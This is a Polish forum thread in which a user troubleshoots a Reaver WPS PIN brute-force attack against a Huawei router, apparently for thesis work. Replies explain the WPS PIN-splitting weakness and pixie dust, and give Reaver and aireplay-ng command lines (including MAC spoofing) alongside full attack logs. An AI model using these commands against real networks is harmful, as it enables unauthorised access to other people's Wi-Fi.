Ocena wątku:
  • 0 głosów - średnia: 0
  • 1
  • 2
  • 3
  • 4
  • 5
[reaver] WPS Atack
#1
Witam,

Mam pytanie, ponieważ nie wiem dlaczego, ale mam problem w reaver'em otóż jak próbuje za jego pomocą złamać PIN do sieci to on ładnie idzie aż do rozpoczęcia generacji PIN (12345670) lecz potem się zapętla.

Wysyła EAPOL START lecz na tym koniec. Czas przekroczony na odpowiedź i tak w kółko. Atakowany przeze mnie ruterek to stojący obok Huawei E5377T, więc nie ma mowy o słabej jakości połaczenia. Czyżby WPS miał fixa na standardowe zabezpieczenie?
Odpowiedz
#2
Użyj wash z odpowiednimi parametrami, a wszystko będzie łatwiejsze...
Reaver - mój ulubiony program...
Odpowiedz
#3
Wash to skanerek i już go używałem aby zlokalizować sieć i sprawdzić blokadę WPS, wiec co masz dokładnie na myśli?

PS. Żeby nie było, nie robię żadnych włamań, wszystko robię na potrzeby pracy inżynierskiej (dosyć samodzielnej) i muszę spełnić pewne wytyczne niestety.
Odpowiedz
#4
Wash-em sprawdzasz podatność na działanie programem Reaver. Jeśli nie pokazuje, że AP jest podatny, to nic nie zrobisz.

http://tools.kali.org/wireless-attacks/reaver
Reaver - mój ulubiony program...
Odpowiedz
#5
Znaczy w jaki sposób? Bo skanując wash, mam informacje WPS w wersji 1.0 i WPS unlocked. Przeglądam dodatkowe opcje wash ale nie widzę, nic szczególnego.

PS. jedyne to to ze RSSI mam wszędzie 0, ale do znany problem i chwilowo nie da się z tym nic zrobić https://bugs.kali.org/view.php?id=1288
Odpowiedz
#6
(09-05-2016, 19:34)Krump napisał(a): Znaczy w jaki sposób? Bo skanując wash, mam informacje WPS w wersji 1.0 i WPS unlocked. Przeglądam dodatkowe opcje wash ale nie widzę, nic szczególnego.

PS. jedyne to to ze RSSI mam wszędzie 0, ale do znany problem i chwilowo nie da się z tym nic zrobić https://bugs.kali.org/view.php?id=1288


WPS łamie się bez znajomości Linuxa i jakiejkolwiek wiedzy

Pobierz ReaverPro iso

można odpalić na Live lub Virtual

film obcja Virtual

[Wideo: https://www.youtube.com/watch?v=nWthd8QsdKA]
Odpowiedz
#7
Super, narzędzie banalne, jak chciałbym się do kogoś włamać.
Lecz ja nie chce się do kogoś włamywać, tylko pozyskać wiedzę w celach edukacyjnych. Wiec opcja AUTO mnie nie urządza. A chce wiedzieć co robię źle, co powinienem sprawdzić i na co zwrócić uwagę.
A więc proszę, jeżeli ktoś jest w stanie o wyjaśnienie, skąd tak się dzieje.
Odpowiedz
#8
Dobra, zacznijmy od początku.
WPS - Wi-Fi protected setup. Pin składa się z 8 cyfr, co daje 10^8 kombinacji. Nieszczęście rozwiązania, zaczyna się już tutaj - ostatnia cyfra to checksum, także mamy do bruteforce'a 10^7 kombinacji. Ale to nie koniec. Po komunikacji rejestrującego się (chętnego do połączenia) z rejestratorem (czyli np. zintegrowanym z AP jak w naszym przypadku) najpierw wymieniane są klucze M1: klient->ap M2: klient<-ap (Diffie-Hellman Key Exchange). Potem musisz udowodnić, że znasz pierwszą część klucza (tak, 8 a właściwie 7 cyfrowy klucz jest dzielony na dwie części po 4 z tą sumą kontrolną). W ap prosi o pierwszą część klucza. Jeśli masz "12345670", co odpowiada pierwszemu testowanemu, i załóżmy, że odpada, to możesz wykluczyć wszystko z zakresu 1234XXXY czyli od 12340000 - 12349999. Jeśli po M4 atakujący dostaje NACK, to znaczy, że pierwsza część pinu jest zła. Jeśli po M6 dostaje NACK to znaczy, że druga część pinu jest zła. NACK czyli negative-acknowledgement zostanie też wysłany jeśli z innych powodów transakcja nie może się odbyć. Czyli z 10^8 zjechaliśmy do 10^4+10^3 w najmniej optymistycznym przypadku. - krypto stojące po stronie wps'a nie jest skomplikowane, jak będziesz chciał to mogę Ci pdfa podrzucić.



Edit
Na razie masz kilka użytecznych linków, bo nie ma sensu, żebym się produkował skoro zrobili to już inni:
https://nakedsecurity.sophos.com/2015/04...wn-crypto/
https://briolidz.wordpress.com/2012/01/1...setup-wps/
http://archive.hack.lu/2014/Hacklu2014_o...on_wps.pdf // opisuje atak offline pixie dust + dobry background o WPS
https://github.com/aanarchyy/bully // alternatywa dla reavera

https://forums.kali.org/showthread.php?2...PS-Attack) /* najlepszy link, zobacz resources. Dobrze wytłumaczona zasada działania + krótkie (2 minut) wprowadzenie do DFKE, plus dokumentacja WPS */

W przypadku Twojego problemu, może przełączniki --no-nacks i --dh-small pomogą. Pierwszy odpowiada za nie wysyłanie negative-acknowledgement w przypadku, druga za użycie małych liczb przy DFKE, co zwiększa szybkość. 

Ew. na "nowym" np tym forku:
https://github.com/t6x/reaver-wps-fork-t6x


Kod:
-vv -w -N -A -P -T 0.5 -x 360 -K 1
Przy czym K odpowiada za pixiedust a nie wszystkie AP są podatne. 

Jakbyś potrzebował wyklarowania czegoś uderzaj śmiało. 
 Gdyby Java miała prawdziwy garbage collector to programy kasowałyby się podczas uruchomienia.

Odpowiedz
#9
Co do tego co opisałeś, to już wcześniej o tym wiedziałem Smile Ale linki które podesłałeś na pewno w ten weekend przestudiuję. PDF też możesz podesłać. Nie pogardzę na pewno dodatkowymi materiałami.

Co do mojego problemu, z oboma przełącznikami próbowałem, gdyż szukałem już rozwiązań lub przyczyn tego problemu. Niestety bez efektu. Poniżej wyniki:
Kod:
root@kali:~# reaver -i wlan0mon -b 90:67:1C:02:4E:4C -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 90:67:1C:02:4E:4C
[+] Switching wlan0mon to channel 1
[+] Associated with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.

Kod:
root@kali:~# reaver -i wlan0mon -b 90:67:1C:02:4E:4C -vv --dh-small

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 90:67:1C:02:4E:4C
[+] Switching wlan0mon to channel 1
[+] Associated with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
c[+] Sending EAPOL START request
c^C
[+] Nothing done, nothing to save.

Kod:
root@kali:~# reaver -i wlan0mon -b 90:67:1C:02:4E:4C -vv --dh-small --no-nacks

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 90:67:1C:02:4E:4C
[+] Switching wlan0mon to channel 1
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
[!] WARNING: Failed to associate with 90:67:1C:02:4E:4C (ESSID: Bloodz)
^C
[+] Nothing done, nothing to save.
Odpowiedz
#10
Kod:
aireplay-ng -1 0  -a mac_ap -h mac<spoofowany/real>klienta wlan0mo
W przypadku ostatniej sytuacji.

Problemem może być też patch, nie wszystko co pokazuje wash jest zgodne z prawdą.




Edit:

Kod:
reaver -i interface -b bssid -a -S -N -c channel -vv
Teraz?

Spróbuj sprecyzować channel i powiedz czy to coś zmienia. Reaver miał problemy z utrzymaniem kanału.
 Gdyby Java miała prawdziwy garbage collector to programy kasowałyby się podczas uruchomienia.

Odpowiedz


Podobne wątki
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Reaver Alladyn 0 280 04-28-2016, 12:31
Ostatni post: Alladyn
  Sposób na WPS locked marflin 2 807 05-18-2015, 15:46
Ostatni post: marflin
  Reaver - Powtarza piny. marcin5747 9 1,382 06-14-2014, 13:18
Ostatni post: GarbatyAniol
  Nowy Reaver w kolejnej wersji Kali? schaaab 2 1,181 02-20-2014, 23:34
Ostatni post: GL0BUS

Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości
stat4u